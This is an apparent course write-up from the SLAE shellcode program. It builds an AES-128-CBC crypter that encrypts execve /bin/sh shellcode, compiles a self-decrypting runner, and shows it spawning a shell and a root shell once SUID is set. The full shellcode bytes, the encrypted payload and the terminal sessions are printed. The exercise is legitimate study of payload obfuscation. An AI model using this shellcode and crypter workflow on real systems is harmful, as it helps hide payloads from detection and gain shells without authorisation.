In this part we’ll use two programs, the encrypting binary for encrypting the unencrypted payload and the self-decrypting binary with the evil payload.
Compile encrypter
First, compile the encrypter using the Bash script as indicated an placed on my Github page for SLAE. The script includes flags to allow stack execution and to link to the OpenSSL libraries.
Also, we’ll be using the execve shellcode for running after having entered a correct password.
$ ../compile_crypter.sh aes-128-cbc_enc
[+] Compiling ...
[+] Done!
$ echo -ne "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" > execve
$ echo -ne "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" | ndisasm -u -
00000000 31C0 xor eax,eax
00000002 31DB xor ebx,ebx
00000004 31C9 xor ecx,ecx
00000006 31D2 xor edx,edx
00000008 50 push eax
00000009 686E2F7368 push dword 0x68732f6e
0000000E 682F2F6269 push dword 0x69622f2f
00000013 682F2F2F2F push dword 0x2f2f2f2f
00000018 89E3 mov ebx,esp
0000001A 50 push eax
0000001B 89E2 mov edx,esp
0000001D 53 push ebx
0000001E 89E1 mov ecx,esp
00000020 B00B mov al,0xb
00000022 CD80 int 0x80
Run the encrypter and use the payload
$ ./aes-128-cbc_enc execve
Enter password to encrypt:
ORIGINAL:
Oneliner:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1\xB0\x0B\xCD\x80";
16-byte newline delimiter:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F"\
"\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1"\
"\xB0\x0B\xCD\x80";
ENCRYPTED:
Oneliner:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
16-byte newline delimiter:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE"\
"\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43"\
"\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";Having run the encrypter, we now have an encrypted variant of the execve shellcode, having entered password “HODORHODORHODOR1234”, which we’ll use later on.
Running decrypter and execute payload
First, we’ll be compiling the decrypter, including the encrypted payload we just generated. Although the password isn’t being echoed, the password will be used for decryption.
$ vim hodor-decrypt-run.c
$ ../../compile_crypter.sh hodor-decrypt-run
[+] Compiling ...
[+] Done!
$ ./hodor-decrypt-run
Enter password to decrypt:
ENCRYPTED:
Oneliner:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
16-byte newline delimiter:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE"\
"\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43"\
"\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
DECRYPTED:
Oneliner:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1\xB0\x0B\xCD\x80\x69\x01";
16-byte newline delimiter:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F"\
"\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1"\
"\xB0\x0B\xCD\x80\x69\x01";
Running shellcode...
$ id
uid=1000(vbox) gid=1000(vbox) groups=1000(vbox),7(lp),27(sudo),100(users),999(vboxsf)
$
Result: running a shell!
Whilst not being perfect, some characters are being used at the end of the original shellcode: this is due to padding and could cause some issues. Of the payloads and passwords I’ve been testing, I didn’t had any trouble running those using the decrypter.
Setting SUID
Let’s add some extra security-issues, such as a SUID bit on the executable. Of course, it’s very unlikely anyone in real-life would set the SUID bit on a malicious payload. Still, we try it anyway and check the results: being root.
$ sudo chown root hodor-decrypt-run
$ sudo chmod +s hodor-decrypt-run
$ ls -l hodor-decrypt-run
-rwsrwsr-x 1 root vbox 7664 Jan 3 22:59 hodor-decrypt-run
$ ./hodor-decrypt-run
Enter password to decrypt:
ENCRYPTED:
Oneliner:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
16-byte newline delimiter:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE"\
"\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43"\
"\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
DECRYPTED:
Oneliner:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1\xB0\x0B\xCD\x80\x69\x01";
16-byte newline delimiter:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F"\
"\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1"\
"\xB0\x0B\xCD\x80\x69\x01";
Running shellcode...
# id
uid=1000(vbox) gid=1000(vbox) euid=0(root) groups=0(root),7(lp),27(sudo),100(users),999(vboxsf),1000(vbox)
# whoami
root
#